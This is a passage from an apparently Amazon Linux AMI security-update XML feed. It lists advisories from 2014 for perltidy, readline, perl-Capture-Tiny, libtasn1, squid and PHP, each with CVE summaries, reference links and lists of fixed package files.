</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4588" title="" id="CVE-2013-4588" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-static" version="2.17" release="55.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-55.84.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-55.84.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="55.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-55.84.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-55.84.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-55.84.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="55.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-55.84.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-55.84.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="55.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-55.84.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-55.84.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="55.84.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-55.84.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.84.amzn1" 
epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-55.84.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="55.84.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-55.84.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.84.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-55.84.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.84.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-55.84.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.84.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-55.84.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="55.84.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-55.84.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="55.84.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-55.84.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.84.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-55.84.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-356</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-356: low priority package update for perltidy</title><issued date="2014-06-15 16:19:00" /><updated date="2014-09-19 10:22:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2277:
1074720:
CVE-2014-2277 perltidy: insecure temporary file creation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2277" title="" id="CVE-2014-2277" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perltidy" version="20121207" release="3.8.amzn1" epoch="0" arch="noarch"><filename>Packages/perltidy-20121207-3.8.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-357</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-357: low priority package update for readline</title><issued date="2014-06-15 16:20:00" /><updated date="2014-09-19 10:23:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2524:
1077023:
CVE-2014-2524 readline: insecure temporary file use in _rl_tropen()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2524" title="" id="CVE-2014-2524" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="readline-debuginfo" version="6.2" release="9.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/readline-debuginfo-6.2-9.14.amzn1.x86_64.rpm</filename></package><package name="readline-static" version="6.2" release="9.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/readline-static-6.2-9.14.amzn1.x86_64.rpm</filename></package><package name="readline" version="6.2" release="9.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/readline-6.2-9.14.amzn1.x86_64.rpm</filename></package><package name="readline-devel" version="6.2" release="9.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/readline-devel-6.2-9.14.amzn1.x86_64.rpm</filename></package><package name="readline-debuginfo" version="6.2" release="9.14.amzn1" epoch="0" arch="i686"><filename>Packages/readline-debuginfo-6.2-9.14.amzn1.i686.rpm</filename></package><package name="readline" version="6.2" release="9.14.amzn1" epoch="0" arch="i686"><filename>Packages/readline-6.2-9.14.amzn1.i686.rpm</filename></package><package name="readline-devel" version="6.2" release="9.14.amzn1" epoch="0" arch="i686"><filename>Packages/readline-devel-6.2-9.14.amzn1.i686.rpm</filename></package><package name="readline-static" version="6.2" release="9.14.amzn1" epoch="0" arch="i686"><filename>Packages/readline-static-6.2-9.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-358</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-358: low priority package update for perl-Capture-Tiny</title><issued date="2014-06-15 16:20:00" /><updated date="2014-09-19 10:23:00" /><severity>low</severity><description>Package updates are available for 
Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1875:
1062424:
CVE-2014-1875 perl-Capture-Tiny: insecure temporary file usage
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1875" title="" id="CVE-2014-1875" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-Capture-Tiny" version="0.24" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Capture-Tiny-0.24-1.5.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-359</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-359: medium priority package update for libtasn1</title><issued date="2014-06-15 16:22:00" /><updated date="2014-09-19 10:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3469:
Multiple NULL pointer dereference flaws were found in libtasn1's asn1_read_value() function. Specially crafted ASN.1 input could cause an application using libtasn1 to crash, if the application used the aforementioned function in a certain way.
CVE-2014-3468:
It was discovered that the asn1_get_bit_der() function of the libtasn1 library incorrectly reported the length of ASN.1-encoded data. Specially crafted ASN.1 input could cause an application using libtasn1 to perform an out-of-bounds access operation, causing the application to crash or, possibly, execute arbitrary code.
CVE-2014-3467:
Multiple incorrect buffer boundary check issues were discovered in libtasn1. Specially crafted ASN.1 input could cause an application using libtasn1 to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3467" title="" id="CVE-2014-3467" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3468" title="" id="CVE-2014-3468" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3469" title="" id="CVE-2014-3469" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0596.html" title="" id="RHSA-2014:0596" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtasn1-debuginfo" version="2.3" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtasn1-debuginfo-2.3-6.6.amzn1.x86_64.rpm</filename></package><package name="libtasn1" version="2.3" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtasn1-2.3-6.6.amzn1.x86_64.rpm</filename></package><package name="libtasn1-devel" version="2.3" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtasn1-devel-2.3-6.6.amzn1.x86_64.rpm</filename></package><package name="libtasn1-tools" version="2.3" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtasn1-tools-2.3-6.6.amzn1.x86_64.rpm</filename></package><package name="libtasn1-devel" version="2.3" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/libtasn1-devel-2.3-6.6.amzn1.i686.rpm</filename></package><package name="libtasn1" version="2.3" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/libtasn1-2.3-6.6.amzn1.i686.rpm</filename></package><package name="libtasn1-tools" version="2.3" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/libtasn1-tools-2.3-6.6.amzn1.i686.rpm</filename></package><package name="libtasn1-debuginfo" version="2.3" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/libtasn1-debuginfo-2.3-6.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-360</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-360: medium priority package update for squid</title><issued date="2014-06-15 16:22:00" /><updated date="2014-09-19 10:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0128:
A denial of service flaw was found in the way Squid processed certain HTTPS requests when the SSL Bump feature was enabled. A remote attacker could send specially crafted requests that could cause Squid to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0128" title="" id="CVE-2014-0128" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0597.html" title="" id="RHSA-2014:0597" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid" version="3.1.10" release="20.15.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.1.10-20.15.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.1.10" release="20.15.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.1.10-20.15.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.1.10" release="20.15.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.1.10-20.15.amzn1.i686.rpm</filename></package><package name="squid" version="3.1.10" release="20.15.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.1.10-20.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-361</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-361: medium priority package update for php54</title><issued date="2014-06-15 16:29:00" /><updated date="2014-09-19 10:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0238:
The cdf_read_property_info function in cdf.c in the Fileinfo component in PHP before 5.4.29 and 5.5.x before 5.5.13 allows remote attackers to cause a denial of service (infinite loop or out-of-bounds memory access) via a vector that (1) has zero length or (2) is too long.
1098155:
CVE-2014-0238 file: CDF property info parsing nelements infinite loop
CVE-2014-0237:
The cdf_unpack_summary_info function in cdf.c in the Fileinfo component in PHP before 5.4.29 and 5.5.x before 5.5.13 allows remote attackers to cause a denial of service (performance degradation) by triggering many file_printf calls.
1098193:
CVE-2014-0237 file: cdf_unpack_summary_info() excessive looping DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0237" title="" id="CVE-2014-0237" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0238" title="" id="CVE-2014-0238" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-pspell" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.29" release="1.55.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php54-pdo-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.29" 
release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.29-1.55.amzn1.i686.rpm</filename></package><package 
name="php54-mysqlnd" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.29-1.55.amzn1.i686.rpm</filename></package><package 
name="php54-mcrypt" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.29-1.55.amzn1.i686.rpm</filename></package><package 
name="php54-mysql" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.29-1.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-362</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-362: medium priority package update for php55</title><issued date="2014-06-15 16:29:00" /><updated date="2014-09-19 10:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0238:
The cdf_read_property_info function in cdf.c in the Fileinfo component in PHP before 5.4.29 and 5.5.x before 5.5.13 allows remote attackers to cause a denial of service (infinite loop or out-of-bounds memory access) via a vector that (1) has zero length or (2) is too long.
1098155:
CVE-2014-0238 file: CDF property info parsing nelements infinite loop
CVE-2014-0237:
The cdf_unpack_summary_info function in cdf.c in the Fileinfo component in PHP before 5.4.29 and 5.5.x before 5.5.13 allows remote attackers to cause a denial of service (performance degradation) by triggering many file_printf calls.
1098193:
CVE-2014-0237 file: cdf_unpack_summary_info() excessive looping DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0237" title="" id="CVE-2014-0237" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0238" title="" id="CVE-2014-0238" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-recode" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.13" release="3.74.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-cli-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-xml" 
version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.13" release="3.74.amzn1" epoch="0" 
